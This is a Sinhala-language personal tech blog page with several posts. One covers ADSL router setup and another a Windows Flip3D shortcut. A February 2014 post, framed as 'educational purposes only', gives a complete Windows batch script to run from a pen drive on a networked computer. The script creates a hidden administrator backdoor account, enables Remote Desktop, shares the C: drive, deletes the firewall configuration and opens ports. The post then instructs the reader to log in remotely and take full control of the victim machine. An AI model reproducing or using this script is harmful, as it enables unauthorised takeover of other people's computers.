Social Icons

Featured Posts

Saturday, March 8, 2014

ADSL Router Configuration දැනුමක් නැතිද..? (කම්පියුටර් ජිල්මාට්ස් පාට්නම්බර් 53)

ආයුබෝවන්... ශ්‍රී ලංකා ටෙලිකොම්. සිංහල භාෂාව සදහා අංක එක ද ට්‍රීක්ක්ක්...  ශ්‍රී ලංකා ටෙලිකොම් සේවා හදුන්වාදීම සහ ප්‍රවර්ධන තොරතුරු සදහා අංක එක ද , දුරකථන දෝෂ වාර්ථාකිරීම සදහා අංක දෙක ද, බ්‍රෝඩ්බෑන්ඩ්.. පියෝ ටීවී.. අන්තර්ජාල දෝෂ වාර්ථාකිරීමට හා සේවා සහාය සදහා අංක තුන ද.... ට්‍රීක්ක්ක්ක්....  බ්‍රෝඩ්බෑන්ඩ් ඒඩීඑසෙල් සදහා අංක එක ද.. ට්‍රීක්ක්ක්ක්ක්.......
…මළා.... ගෙදර අන්තර්ජාල හුටපටයක් වගේ... ජිලාගෙ ප්‍රධාන සේවා මූලස්ථානය හින්දා බොලා ජිලාට අමතන්නද හදන්නෙ ඔහොම..? ඔහොම බෑ බොලව්...
…ජිලා ෆේස්බුකියට ගොඩවෙච්චි වෙලාවටත් බොලා දිගට හරහට පුරස්ණ පත්තරයක් දිගහරිනවා..  මොබයිල් එකට කතාකරල අහගන්නවත් මදිවට දැන් තවත් රාජකාරියක් පටන් අරන්.. මගේ ආයතනයේ සේවකයින්ට බොලාව පුංචිදේකටත් නළවන්නයි කියන්නෙ... හිටපියව්... හිටපියව්... ඒකත් කියල දෙන්න... ඔන්න එහෙනම් අද ජිලාගෙ පාඩම ජිල්මාට්ටුවක් නම් නෙවෙයි ඈ... ශ්‍රී ලංකා ටෙලිකොම් ආයතනයෙන් සපයන ADSL සබදතාවය ඔබ විසින්ම සැකසුම් සකසාගන්නෙ කොහොමද කියල මුලසිට සරලව කියල දෙන්නයි ඈ...

…හරි කොහොමද ඔබට ලැබෙන Modem එක Router එකක් තනිවම සැකසුම් සකසාගන්නෙ..? 

 හරිම ලොල්සහගතයි... මෙතනට දුරකථන කේබලය සවිකරන්නලු... විදුලිය ලබාදීම මෙතැනටලු... Wi-Fi switch On/Off ලු.. Power switch On/Off ලු.. Reset Button එක මෙතැන ලු... මේ පරිගණක සම්බන්ධකළයුතු ස්ථානලු..එතනත් පරිගණක 3ක් සම්බන්ධ කරන්න පුළුවන්ලු... එකක් Peo TV එකටලු... අනේමන්දා...
…හරි හරි අපහැදිළියි තමයි අනේ දැන් පැහැදිළි කොරලම දෙන්නම්කො ආයෙ අමතක නොවෙන්නම... 




 සාමාන්‍යයෙන් ADSL මේක දන්න සිංහලෙන් කිව්වොත් Asymmetric digital subscriber line එකක්  නැතත්..  ශ්‍රී ලංකා ටෙලිකොම් ආයතනය විසින් සපයන රැහැන් දුරකථන සේවාවට එම දුරකථනය සම්බන්ධ කරන උපාංගය තමයි මේ Phone Socket කියල සරලව කියන්නෙ.. ඔය තියෙන්නේ ඒකක්... ඈ...  

මේ තියෙන්නෙ 2-Port Splitter එකක් එහෙමත් නැත්නම් මේකට 2 Port Combiner කියලත් කියනවා...
ම්ම්.... දැන් අපි හදන්නෙ ADSL සබදතාවය ගොඩනංවා ගන්නනෙ... හරි ඔයාගෙ Phone Socket එක හරහා ඔයාගෙ දුරකථනයට සම්බන්ධ කර ඇති රැහැන මෙන්න මේ 2-Port Splitter එකේ Phone Line කියන port එකට ඒ රැහැනෙන් සම්බන්ධකරන්න..
…හරි දැන් බලන්න 2-Port Splitter එකේ අනික් පැත්ත... මෙන්න මේවගේ ඇති.
මෙහෙම නේද..? ඔය Phone කියල තියන port එකට දුරකථනයත්... Modem කියල තියන port එකට ඔයාට හිමි Modem එක.. එහෙමත් නැත්නම් Router එකත් තමයි සම්බන්ධ කලයුතු. මේ තියෙන්නේ ඒ රැහැන්...
දුරකථනයට නම් සම්බන්ධ කලා...

හරි දැන් අපි ඔන්න හැරෙනවා Modem එක පැත්තට.. බලන්න මේ Modem එකේ තියන Ports දිහා...
ඔය තියෙන්නෙ... Line කියල හදුන්වපු port එකට මොකක්ද සම්බන්ධ කළයුතු රැහැන කියල අමුතුවෙන් කියන්න ඕනි නෑනෙ... අහනවනම් ආයෙමත් මුන්ට සෝරි යට ගිහින්වරෙන්කො එතකොට තේරෙයි..
…හරි.. මේ LAN1, LAN2, LAN3 කියල තියන ports 3ට ඔබගේ ඕනෑම මෙහෙයුම්පද්ධතියකින් ධාවනය වන ඕනෑම පරිගණකයකට අන්තර්ජාල පහසුකම ලබාදීමේ හැකියාවක් තියනවා.
…ඒත් මේ LAN4 මගින් අප ආයතනය විසින් සපයනු ලබන Peo TV සබදතාව ගොඩනංවාගන්නයි තියෙන්නෙ ඈ...

මේ තියෙන්නෙ cross cable එකක්.. මෙය හරහා ඔබට Modem යත් පරිගණකත් අතර සබදතාව ගොඩනංවා ගනිමින් අන්තර්ජාල පිවිසුම ගොඩනංවාගන්න පුළුවන්. මීටත් අමතරව මේ Cross Cable එක හරහා කළහැකි තවත් කාර්‍යයක් වගේම තමන්ටම කියල තමන්ම මේ Cross Cable එකක් එහෙමත් නැත්නම් Patch Cable එකක් හදාගන්න විදියත් ජිලා මීට කලින් ජිල්මාට්ස් පෝස්ටුවකින්ම කියල දුන්න... අමතක අය මෙතනට කොටන්නකෝ... 


Power : විදුලි සම්බන්ධක ඇඩැප්පරය මගින් මෙතනට විදුලිය ලබාදී Switch බට්නය හරහා Modem එක On / Off කරගන්න පුළුවන්.. Wi-Fi සබදතාව ක්‍රියාත්මක කරවීම සදහා එම බට්නය ඔබන්න..
…හරි... හිතුවද දැන් වැඩේ අහවරයි කියල...? හරිම ලේසියි නේ.. ඔක්කොම ටික බ්ලග් කලා නිවැරදිව.. දැන් switch on කරගෙන බලන් ඉන්නව Internet යන්න... අනේ අනිස්සං...
දැන් ආයෙමත් බලන්න Splitter එකට Line , Phone සහ DSL යන කේබල් තුනම නිවැරදිව සම්බන්ධ කරලද කියල... 
…DSL ...?? ඔව්.. DSL කිව්වෙත් මේ Modem එකට Router එකටම  තමා ඈ...
  • …Phone නමැති ස්ථානය දුරකථන කේබලයක් මගින් දුරකථනයට සවිකරන්න.
  • …DSL නමැති ස්ථානය දුරකථන කේබලයක් මගින් රවුටරයට සවිකරන්න.
  • …Line නමැති ස්ථානයට නිවසේ ප්‍රධාන දුරකථන කේබලය සවිකරන්න. 
  • …ඔබගේ රවුටරය RJ45 Cross කේබලය මගින් පරිගණකයට සම්බන්ධකරන්න.   

     

    දැන් අපි Router එකේ සැකසුම් හදමු

    Double click the internet browser which  you are using...  
    Browser එකේ අපි ලින්කු එහෙමත් නැත්නම් url කොටන තැන 192.168.1.1 ලෙස යොදා enter කරන්න...
    …ඔන්න අහනවා User Name and Password ඒ දෙකටම admin ලෙස යොදන්න..
    … User Name : admin
     Password    : admin
    දැන් ඔන්න අපේ රවුටරයට ලොග්වෙනවා... හරි දැන් Interface Setup මත click කරන්න  
    Interface Setup මත click කර ලැබෙන පිටුවේ ඔබට ලබාදුන් Username and password යොදන්න
    …උදා : Username : aa2251515@sltbb
             Password  : pass123


    දැන් Save කරන්න 

    පහත පියවර අනුගමනය කිරීමෙන් ඔබට ඔබගේ රවුටරයේ Wi-Fi නොහොත් Wireless settings සකසාගත හැක.  

     Interface Setup click කර Wireless යන්න වෙතට පිවිසෙන්න.. ඉන්පසු Access Point යන්න Activate කරන්න 


    Authentication type සදහා  WPA-PSK ලෙස තෝරාගන්න 

     Pre-shared Key සදහා ඔබට කැමති මුරපදයක් ඇතුළත්කරන්න.. එහි ආරක්ෂාව උදෙසා අවමය අකුරු 8කට සීමාකරන්න. මෙම මුරපදය ඔබට සබදතාව ලබාගැනීමේදී ඇතුළත්කලයුතු බැවින් මතකයේ රැදෙන්නක් භාවිතකරන්න. 
     

    නැවත Save කරන්න...  
       

    දැන් Maintenance වෙතින් SysRestart යන්න දී සැකසුම් ස්ථාවරකරන්න... 

    • Router Configurations ඉහත පරිදි කල පසු Internet බල්බය රතුපැහැයෙන් දැල්වී මද වේලාවකින් කොළ පැහැගැන්වේ... (මෙම සැකසුම් සකසා බල්බය කොළපැහැ වීමට විනාඩි 10ත් විනාඩි 15ත් අතර කාලයක් ගතවන බැව් කරුණාවෙන් සළකන්න.)
    • ඉහත පරිදි කලපසු Internet bulb ය දැල්වී කොළපැහැවී තිබෙන අතර බල්බය blink වේ.

    • …Internet bulb ය කොළපැහැ වීමෙන් පසුවද නැවත රතුපැහැ වීනම් නැවත Router Configuration කළයුතුය.
    • Router Configuration කළපසුද Internet bulb ය කොළපැහැ නොවේනම් Router හි යටිපැත්තේ ඇති Reset button එක පෑන්තුඩක් ආධාරයෙන් මදවේලාවක් තදකරගෙන සිට නැවත Configuration කරන්න එවිට Internet bulb ය රතුපැහැයෙන් දැල්වී මදවේලාවකින් කොළපැහැ ගැන්වේ...

    • …Router හි මුල් බල්බ 3ම කොළපැහැයෙන් දැල්වූවත්  අන්තර්ජාලයේ සැරිසැරිය නොහැකිනම් පරිගණකය චෙක්කරන්න...

    ඔබගේ ADSL සබදතාව ක්‍රියානොකරන අවස්ථාවකදී එය නිදොස්කරගැනීම සදහා පහත පියවරයන් අනුගමනය කරන්න.  

    • Splitter එක හරහා Router එක සහ දුරකථනය නිවැරදිව සම්බන්ධවී තිබේදැයි බලන්න.
    • Splitter එක ඉවත්කර Router ය කෙලින්ම දුරකථන සම්බන්ධතාවයට සවිකර ADSL bulb එක දැල්වී ඇත්දැයි පරීක්ෂාකරබලන්න.
    • තවමත් DSL Indicator එක Blink වේනම් Router එක ගළවා එතැනට දුරකථනය සම්බන්ධකර Dial Tone තිබේදැයි බලන්න.

    • …ADSL Bulb ය දැල්වී ඇතිවිට Internet Bulb ය රතුපැහැයෙන් දැල්වේනම් නැවතවරක් ඔබට ලබාදුන් User Name  Password නිවැරදිව Router ට ඇතුළත්කරන්න.

    • …පාවිච්චිකරන ලද Router යක් Modem යක් නැවත සැකසීමට පෙර පෑනක තුඩක් වැනිදෙයක් ආධාරයෙන් Router / Modem හි යටිපැත්තේ ඇති Reset Button එක මද වේලාවක් තදකරගෙන සිටීමෙන් Router / Modem හි ක්‍රියාකාරිත්වය අලුත්ම Router යක තත්වයට පත්වේ..

    …Router Reset Button එක මෙතැන.


    • …Router මුල් bulb 3ම කොළපැහැයෙන් දැල්වී ඇතිවිටද internet browse කලනොහැකිනම් පරිගණකයේ සැකසුම් පරික්ෂාකරන්න..විශේෂයෙන්ම නිවැරදිම  Ethernet Driver ස්ථාපිතව ඇත්දැයි බලන්න.

    • Router configuration නැවත කළපසු ද Internet bulb ය රතු පාටට දැල්වී නම් සහාය සදහා 1212 අමතන්න..

    • හැබෑටම Username and Password අමතක උනොත්....?
    …මොකද කරන්නෙ...? 1212 අමතන්න .. Username එකනම් දැනගන්න පුළුවන්... Password එකත් කියනවද..? ඔව් Password එකත් කියන්නම් ඒකත් reset කරල දෙන්නම්... හැබැයි අදාළ දුරකථනයෙන්ම අමතන්න ඕනි ඈ... …
     
    දැන් මේක කියවන උන්දැලෑ දන්නවනෙ මින් ඉදිරියට ADSL පුරස්ණයක් මතු උනොත් කරන්න ඕනි දේ... එහෙමත් නැත්නම් මුලසිට සරලව කොහොමද තනිවම අලුත ගෙනා හෝ යළිත් සකසන Router එකක් ආශ්‍රයෙන් අන්තර්ජාලයට පිවිසීමේ ක්‍රියා පිළිවෙත්...
    …ඔව් දන්නවා... පිළිතුර එයනම්... තමන් තනිව බුදුවීමේ පරමාර්ථයෙන් මිදී නොදන්නා අයටත් දැනගන්න මේගැන දැනුවත් කරමු.  share කරමු.

    …ශ්‍රී ලංකා ටෙලිකොම් නොඅමතා ඔබගේ ADSL Router configurations කළ ඔබට ස්තුතියි!.

Thursday, February 13, 2014

Network පරිගණක සොරකම් කිරීම. (කම්පියුටර් ජිල්මාට්ස් පාට්නම්බර් 52)

  අද 2014ක් වූ පෙබරවාරි මස 14 වන පෙම්වතුන්ගේ දිනයලු.. ඊටත් කලින්නෙ අවුරුද්ද ලැබුවෙ. අලුත් අවුරුද්දට අලුත් පෝස්ටුවක් කෙසේවෙතත්  ජිලාගෙ සහෘදයන්ට ජිලා ලැබුවා වූ සුභම සුභ වසරට සුභපතල ඉන්න එපැයි.. ඕං එහෙනං...





අෆ්ෆා 2014 අවුරුද්දත් ලැබුවා ජිලාගෙ ජිල්මාට්ස් බ්ලොගිය අප්ටුඩේට් වීමක් වෙන්නෙම නැද්දෝයි කියල ජිලාගෙ බුකියෙ ගිණුමට ආපු මැසේජ්ජු අනන්තයි අප්‍රමාණයි.. 2013 දෙසැම්බරයේ අවසන් දවස් කීපයේ ජිලාට සෙනසුරු බලපෑමක් ලබලද කොහෙද ජිලාගෙ ආදරණීය අම්මිගෙන් ජිලාගෙ ප්‍රේමවෘතාන්තයට දැඩි බාධකයක් වුනා.. අප්පොච්චියේ ඒදවස් වල ජිලා සමහර දවසක ගෙදර වර්ජනය කිරීමට තරම් හිතුවක්කාර චරිතයක් වෙලා.. බලන්න එපැයි ඒ දවස් වල ජිලා කරපු පිස්සු වැඩ.. මතක්වෙනකොටත් බඩපපුව හෝස්ගාල දැවී යනවා.. ඕං ඉතින් කවදත් ජිලාට ඕනිම වෙලාවක උගේ ළගින්ම ඉන්න උගේ මහමොළකරු මාමා සහ පුංචි මොළකරු මල්ලියා දෙසැම්බරයේ ක්‍රිස්මස් සීසන් එකට ලංකාවට හදිසියේම ගොඩබැස්සෙ ජිලාගෙ මේ හිතුවක්කාර වැඩ නවත්වන්න හිතාගෙන.. ඔන්න ජිලාට උන්ගෙ ආදරේ හොදට ලැබෙනවලු ඈ.. ඒ විතරක්ද නෙවෙයි මහමොළකරුයි පුංචි මොළකරුයි දෙන්නම එකතුවෙලා ජිලාගෙ මේ මොළගෙඩියට තවත් සුකුරුත්තම් කියලදෙන්න..උගන්වන්න කාලය හදාගත්තු එක නොරහසක්.
…ඔන්න ඉතිං මේදවස්වල ජිලාට හරිහැටි ෆේස්බුකියටත් ගොඩවෙලා දන්නදේ කියාදෙමින් දැනුම බෙදිල්ලේ කැසිල්ල තරමක් සුවවෙලා තිබුණ බවනම් සහතික ඇත්ත. මොකෝ ඒදවස් වල ජිලාට මාමාගෙන් සහ මල්ලිගෙන් ඉගෙනගැනිල්ලේ කැසිල්ල උග්‍රව හැදුණ නිසා... මොකක්...මල්ලිගෙන් ඉගෙනගත්තා..? ඔව්...බොල ඔව්.. ජිලාගෙ මහමොළකරුගෙ පුතණ්ඩියා C)PTE මට්ටමටත් එහාගිහින්.. ජිලාටත් ඉතිං එව්ව මෙව්වා උගන්වන ගමන් ජිලා විසින් පවත්වනු ලබන පංතිවලටත් ඉගැන්වූවයි කියන්නෙ..
…ඔන්න ඉතිං ඉගෙනගැනිල්ලේ උග්‍ර කැසිල්ල නිසා ජනවාරියේ 10 වෙනිදා දක්වාම බ්ලොගියට ගොඩවෙන්න තියා බුකියට ගොඩවෙන්නවත් ජිලාට වෙලාවක් තිබුණෙ නෑලු..
…ජිලාගෙ මහමොළකරුයි එයාගෙ හාමිනේයි ජිලාගෙ පුංචි මොළකරුයි ආයෙමත් සිය වාසස්ථානයට ගුවන්ගතවෙද්දි ජිලා ළගම හිටපු එක්කුස උපන් ජිලාට හතුරු මිතුරු  ආදරණීය මලයණ්ඩිත් එක්කරගෙන ගියපු නිසා ජිලාහිටියෙ දැඩි කනස්සල්ලෙන්..පාලුවෙන්..සාංකාවෙන්.. ඒ අස්සෙ රාජකාරී ආයතනයන්හි සහ පංති වල වැඩකටයුතු නිසාම තරමක් කාර්‍යබහුල චරිතයක් වීම  නිසාත් ඔන්න ජිලාට බ්ලොගියට පෝස්ටු ලියාගන්ට බැරි උනා...
…අද හරියටම 2014 ක්වූ පෙබරවාරි මස 14 වෙනිද. උඹලට වැලන්ටයින් දවස... ජිලාට ඊටත් වඩා විශේෂ අතිවිශේෂ...සුවිශේෂ දවසක්ලු ඈ...

…♡පෙබරවාරි 14 ජිලාගෙ ආදරණීය මල්ලිට වයස අවුරුදු 17ක් සපිරෙණ දවස වීම.

♛පෙබරවාරි 14 ජිලා milw0rms නම්වූ සංවිධානයේ සාමාජිකත්වය ලබා වසරක් සපිරෙන දවස වීම.
        (milw0rms සංවිධානය එක්තරා තරුණ හැකර්වරුන්ගේ එකමුතුවක් වූ නමුත්.. ඇත්තෙන්ම අප අතර විෂයපථධාරී  දැනුම හුවමාරුවීමක්... පමණක් සිදුවන බවත් දැන්වීමට කැමැත්තෙමි.) 

[̲̅ə̲̅٨̲̅٥̲̅٦̲̅] හැමෝටම වැලන්ටයින් දවසේ ජිලා සිය පෙම්වතිය  නැවත වරක් මුණගැසීම සහ විශේෂ යමක් දුන් දවස වීම... දුන්නෙ මොනවද කියල අහන්න එපා හරිය... ලජ්ජයි ඕයි කලිසමක් ඇදන් මේකෙ කොටන්න බැරුවා...

අනික තමා.. ජිලාගෙ ආදරණීය සහෘදයන්ට අලුත් අවුරුද්දෙදි සුභ අශුභ නොබලා මුලින්ම මෙවැන් අසික්කිත ජිල්මාට්ස්  පෝස්ටුවක් ලියමින් උන්ගේ මෙව්වා එක වර්ධනය කිරීමට තැත්කිරීම..

හරි එහෙනම් මෙන්න ජිලාගේ මෙවර අසික්කිත ජිල්මාට්ස් කෙරුවාව... මෙය හුදෙක් හැක්කිරීමට නොව  Educational Purchase Only... හරිය...

හලි හලි දැන් අපි කොරන්න යන්නෙ කොරවෙන වැඩක් හරිය... Network එකක් අපි අතට ගැනිල්ලක්..
…සූදානම් වෙනු!...
…හරි... එහෙනම් දැන් ඔයාගෙ pen drive එක කම්පියුටර් එකට සම්බන්ධ කොරන් notepad එක දිගහැරගත්තනම්...
…හරි දැන් මේං මේක ඕකෙ කෙටුවනම් බලන්න...
 
@echo off
REM EDIT THESE SETTINGS
set username=USERNAME
set password=PASSWORD
set rdport=3389  
set tnport=23
set rport=CHANGE_THIS
REM END EDITING SETTINGS

REM Adding The Backdoor
net user %username% %password% /add
REM Pause For Process
ping localhost -n 2 >nul
REM Adding Admin Access The Backdoor 
net localgroup Administrators %username% /add
REM Hiding The Backdoor From Start Menu
REG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nul
REM Enabling Terminal Service
REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0
REM Share C:\
net share system=C:\ /unlimited
REM Stealing The IP Stuff
ipconfig /all >> G:\attach.txt  (මෙහි G: උඹේ pen drive path letter වියයුතුයි.) 
REM Deleting The Firewall Configuration
netsh firewall delete
REM Opening Ports
netsh firewall add portopening TCP %rdport% "WinSvcService"
netsh firewall add portopening TCP %tnport2% "WinSvcService"
netsh firewall add portopening TCP %rport% "WinSvcService"
cls
exit

…දැන් ඉතින් ඕක ඔයාගෙ pen drive එකට  jilmarts.bat ලෙස save කරගන්නකෝ..
…ඔන්න ඉතින් වැහිනැති හෙනගෙඩියක් හැදුවා... දැන් තියෙන්නෙ ඉතිං දමල ගැහිල්ලක් හරිය..
…දමල ගහන්න කලින් ඕක Network එකේ තියන කම්පියුටර් එකක run කරන්නකෝ...
…ඔන්න ඉතිං දැන් හරිලු ඈ...දැන් ජිලාට පිං සිද්ධ වෙයං දෙයියනේ කියාගෙන උඹේ කම්පියුටර් එකට ඇවිදින්  Remote Desktop Connection එකෙන් හරි Telnet සූත්තරෙන් හරි දන්න සරල පහසු සූත්තරේකින්  අදාළ කම්පියුටර් එකට ලොග්වෙලා Username එකයි password එකයි දන්නවනේ...( Username = Username / Password = password දීල)  ඕනි ඕනි දේවල් කරගන්න ඕනිවිදියට ඒ කම්පියුටරේ සම්පූර්ණ  පාලනය උඹේ අයිතියට ගන්නත් දැන් උඹට පුළුවන්ලු ඈ...




















Saturday, November 23, 2013

Windows වල Windows කැරකැවිල්ල (කම්පියුටර් ජිල්මාට්ස් පාට්නම්බර් 51)

හප්පොච්චියේ සෑහෙන කාලෙකින් ජිලා ජිල්මාට්ස් පෝස්ටුවක් අරංඇවිදින්... දකින්නත් සන්තෝෂයි ඕයි..අම්මප ඈ... ජිලා සත්‍ය ලෝකෙදි හමුවන අපූරු මිත්‍රයින් නිතර කියන කතාවක් තමයි උඹ දැන් මහත් වෙලා මේං බඩකුත් ඇවිත්...දැන් බඩට මාස කීයද කියල... පලඩෝ යන්න.. මොන බඩක්ද..? උඹල හිතුවද ජිලා ගර්භණී අවස්ථාවෙ කියලද..? ජිලා ගෑණියෙක් නෙවේ ඈ.. තවත් එවුන් කියන්නෙ දැන් මූට සැපවැඩියි කියල.. ඉතිං හත්වලාමේ සැප ලැබෙන කොට එපා කියන්නෙ මොකාද..?
ජිලා දැන් තරමක් කාර්‍යබහුල චරිතයක් වෙලාලු.. ඉතිං සමහර උන් හිතනවා ජිලා දැන් ජිල්මාට්ස් පෝස්ටුත් අරන් ජිල්මාට්ස් බ්ලොගිය අලුත්කරන්නෙ නෑ කියල.. ඒක ඉතිං අමූලිකම අමූලික පට්ටපල් බොරුවක් ඈ... කොතරම් කාර්‍යබහුල උනත් යහළුවන්ට උදව් කිරිල්ලේ කැසිල්ලත්.. දන්නාදේ කියාදීමේ කැසිල්ලේ රෝගාබාධයත් තවම තියනවලු ඈ.. ඒ අස්සෙ එක එකා මේ රෝගය සුවකරගන්න එක එක කෙම්ක්‍රම ජිලාට පෞද්ගලිකවම කියනවලු... ඒ දැන් ජිල්මාට්ස් බ්ලොගියට අවසන් තිත තියපන් කියල.. ඒත් ඒ එක කෙමක්වත් ජිලාගෙ මේ ශරීර සෞඛ්‍යයට ඔරොත්තුනොදෙන නිසා ඉදිරියටත් ජිල්මාට්ස් බ්ලොගිය උඹවෙත දිගහරිනව කියන්නෙත් බොහොම කැමැත්තෙන් හොදේ...
…ඔන්න ගියවතාවේ ජිල්මාට්ස් අඩවියේ 50වැනි පෝස්ටුවත් දිගහැරුණා... බොහොම ආඩම්බර ලීලාවෙන්.. මේ ජිල්මාට්ස් පාට්නම්බර් 51.. ජිල්මාට්ස් අඩවියේ පෝස්ටු සොරකමින් එක එක ජිල්මාට්ස්ලා බෝවෙන්න පටන් අරං ජිලාගෙ ජිල්මාට්ස් පෝස්ටුවම උස්සලා "ඔන්න මුල්ම වතාවට වෙබ් අඩවි බ්ලොග් අඩවි කලාවේ ප්‍රථම දිගහැරුම මාතෘකාවකුත් දාගෙන බ්ලොග් කලාවේ ඉදිරියට එන්න සමත් බ්ලොග් අඩවි කිහිපයක්මත් ජිලාට හමු උනා... අනේ මුන් කොහොම මේව කොටනවද මන්දා....... එතකොට ජිල්මාට්ස් පෝස්ටුවෙන්ම උස්සපු එකම ලියලා ඒක ප්‍රථමවතාවටලු.. පුකෙනුත් හිනා යනව ඈ...අම්මප..
……ඒ බයිලා වලින් වැඩක් නෑ..  අද ජිලාගේ අලුත්ම මාතෘකාව Windows වල Windows කැරකැවිල්ලලු..
…මොකක්ද බොල ඒ හරුපෙ..? Windows වල Windows කැරකැවිල්ල.. ?? ඔය වචනෙත් ඉතිං මගේ වචනයක්ම නෙවෙයි ඈ... ඒකත් කියන්න එපැයි.. මගේ අනාගත හාමිනේ පොඩ්ඩගෙ වචනයක් ඕක.. අද මම සතියකට පස්සෙ මගේ වෙන්ඩ නෝනිව බලන්ට කරාපිටිය ක්ෂිශණ රෝහලට ගියා.. යද්දිත් එයා ඔපරේෂන් තීටර් එකේ ඔපරේෂන් එකක.. වෙනදා තීටර් එකට ඇතුළුවෙන පුරුද්දට අදත් ඇතුළු උනා... හෆොයි දෙයියනේ වෙච්චි දෙයක්... එයා මගේ කනින් අල්ලගෙන ඇවිදින් තීටර් එකෙන් එළියට ඇදලදැම්මලු ඈ... පිරිමියෙක් වෙච්චි මට ඒ සීන් එක බ්ලූ එකක්ලු ඈ.. කියන්න ඕනි නෑනෙ ඔපරේෂන් එකට අරන් තියෙන්නෙ ස්ත්‍රී පාර්ශවයේ කෙනෙක්.. සම්පූර්ණ නිරුවත්... මේව මෙහෙම කියන එක හරිද මන්දා ඕයි... වෙනදටත් මේ වගේ සිද්ධිවෙනකොට මාව මේ විදියටම කනෙන් අල්ලල දොට්ට...
…කොරන්ටත් දෙයක් නැති එකේ හෙමිහිට එයාගෙ වෝඩ් එකට ඇවිදින් එයාගෙ ලැප්ටොප් එක දිගහැරියලු... මෙන්න බොලේ වැඩක්... මෙයා MAC Operating System එකේ theam එකක් දාගෙන හැඩවැඩකරලා...
ඔන්න ඉතින් මම එයාගෙන් හේතුව ඇහුවම එයා විශේෂ කලේ මේ Mac OS theam එකේ තියන දිගහැරගත් ඇප්ලිකේෂනස් වෙත පහසුවෙන් තොරාගැනීමට ඒ අදාළ window එක කරකවමින් ඒවෙත ළගාවීමේ හැකියාව.. එයා කිව්වෙ ඉතිං windows වල මේ විදියට windows කරකවන්න බෑ කියල... ඔන්න ඉතිං ඒ බෑකියපු ඒ windows වල windows කැරකැවිල්ලේ රහසත් මම මගේ පැටියට කියලදුන්න..
…දැන් ඉතිං උඹල හිතයි දැන් ජිලා වෙනස් වෙලා කියල.. ආදරවන්තියක් ලැබුණ නිසා කියල.. පොඩ්ඩක් වෙනස් උනා හැබැයි සම්පූර්ණවම නෙවෙයි ඈ.. මේං එහෙනම් දැන් මම මේ උඹලටත් මේ කියලදෙන්නයි යන්නේ....
…දැනටමත් දන්නව ඇතිනෙ මොකක්ද මේ ජිලාගෙ වෙන්ඩ නෝනි මේ කියල තියෙන්නෙ ජිලා මොකක්ද මේ කියලදෙන්න යන්නෙ කියල.. හරි වැඩිකතා ඕනි නෑ එහෙමනම් කරලම බලමුකෝ මොකක්ද මේදෙන්නගෙ මේ හුටපටෙන් ජිලා කියල දුන්නෙ මොකක්ද කියල 
හලි එහෙනම් ඔන්න ඩෙස්ක්ටොප් එක උඩ right click කොලා දැන් ඉතින් මේ ජිලා ගහන බෙරේ  තාලෙට මගේ මේ යහළුවො සෙට් එක නටවලු ඈ... වැරදුණාද මන්දා,.. නෑ නෑ ජිලා මේ කියන විදියට කරනවලු ඈ..
…new >> shortcut දැන් ඉතිං  RunDll32 DwmApi #105 කියල කොටනවා ඉන්පස්සෙ ඉතින් next ඈ... ඉන්පස්සෙ Type a name for this shortcut කියන තැනට Flip3D  කියල කොටලා save කරනවලු ඈ..
හලි දැන් ඉතින් ඔය ඩෙස්ක්ටොප් එක මතතියන Flip3D එක උඩ right click >> properties >> change Icon එකට එන්නකෝ...
…හරි දැන් ඔය Browse කියන බට්න් එකෙන් C partition >> Windows >> explorer එකට එන්නකෝ ඒකියන්නෙ මෙහෙමයි ඈ.. C:\windows\explorer.exe හරි දැන් ඔතැනින් Icon එකක් තෝරාගන්න හරි දැන් ok
දැන් ඉතින් ජිලා කියනවා ඔයා ඔය හදාගත්තු මෙව්ව එක Taskbar එකට ඇදල දාන්න කියල..
…ඔන්න වැඩේ අහවරයිලු ඈ.. ඔයාගෙ කම්පියුටර් එකේ තියන අනංමනං අරවමෙව්ව සෙට් එකක්ම දිගහැරගෙන දැන් අර Taskbar එකට දමපු මෙව්ව එක ක්ලික් කොරමුකො බලන්න...............

…"ආව්.........ලස්සන.............. ෂා මරුනෙ පැටියෝ...." ඔය ටිකම තමයි මගේ එක්කෙනත් කිව්වෙ ඈ...
එයානම් ඉතිං මට පොඩි මෙව්ව එකක් දුන්නා.. උඹත් ඉතිං මට මෙව්ව එකකින් කමෙන්ටුවක් ෆේස්බුකියේ share පාරක් දැම්මොත් නරකනෑ ඈ.. ජිල්මාට්ස් බ්ලොග් අඩවිය ගැන අනික් අයවත් දැනුවත්කරමු කියන්නෙ ජිලා බෙදන දැනුම එකතැනකට එක් අයෙකුට සීමා නොවියයුතු නිසා..
අහ්! අමතකම වෙලා ගියානෙ... යන්තම් මේ පෝස්ටුව බලපු මුල්ම පුද්ගලය උනෙත් කටුකුරුන්ද  ශ්‍රී ලංකා විශේෂ කාර්‍යබලකායෙ තොරතුරු තාක්ෂණික අංශ ප්‍රධාන මාහිතාදර විමලරත්න උතුමාණන් ක්ෂණික ඇමතුමකින් මාව අමතා අමතකව ගිය යමක් එළියට ඇදල ගත්තා.. ඒ මේ සූත්තරයම Windows key + Tab මත සිට හැසිරවිය හැකි බැව්... ඉතිං ඒකටත් විශේෂ තුති ඈ... අයියේ.. ඕං මම ඒක මෙතැන කිව්වා...
හප්පොච්චියේ මේං මේක මම උඹලට කියලදෙන්නෙ මම තවමත් කරාපිටිය ක්ෂිශණ රෝහලේ එයාට භාරවතියන වෝඩ් එකේ එයාගෙ සැපපුටුවට වෙලා එයාගෙ ලැප්ටොප් කම්පියුටර් එකෙන්මයි.. ඈ යකෝ කොල්ලට මෙහෙම පුටු රත්කරන්න කියලදෙන මගේම මගේ පෙම්වතියකුත් ඉන්නවා එහෙනම්.. පුටුව රත්කොලා ඇතිවගේ.. ආයෙමත් දුවන්න ඕනි ඔපරේෂන් තීටර් එක පැත්තට.. ආයිමත් සැරයක් කනින් අල්ලාගෙන ඇවිදින් එළියට දායිද මන්දා පොඩ්ඩක් එළියෙන් ඉන්න මම එනකම් කියල.. ඒ මොකවෙතත් ගිහින් බලමුකෝ  මම ගියා ඈ... ආයෙමත් දවසක හමුවන බලාපොරොත්තුවෙන්...

Thursday, November 7, 2013

මට මගේම නොවන Web Browser එකක් හදාගැනිල්ල. (කම්පියුටර් ජිල්මාට්ස් පාට්නම්බර් 50)

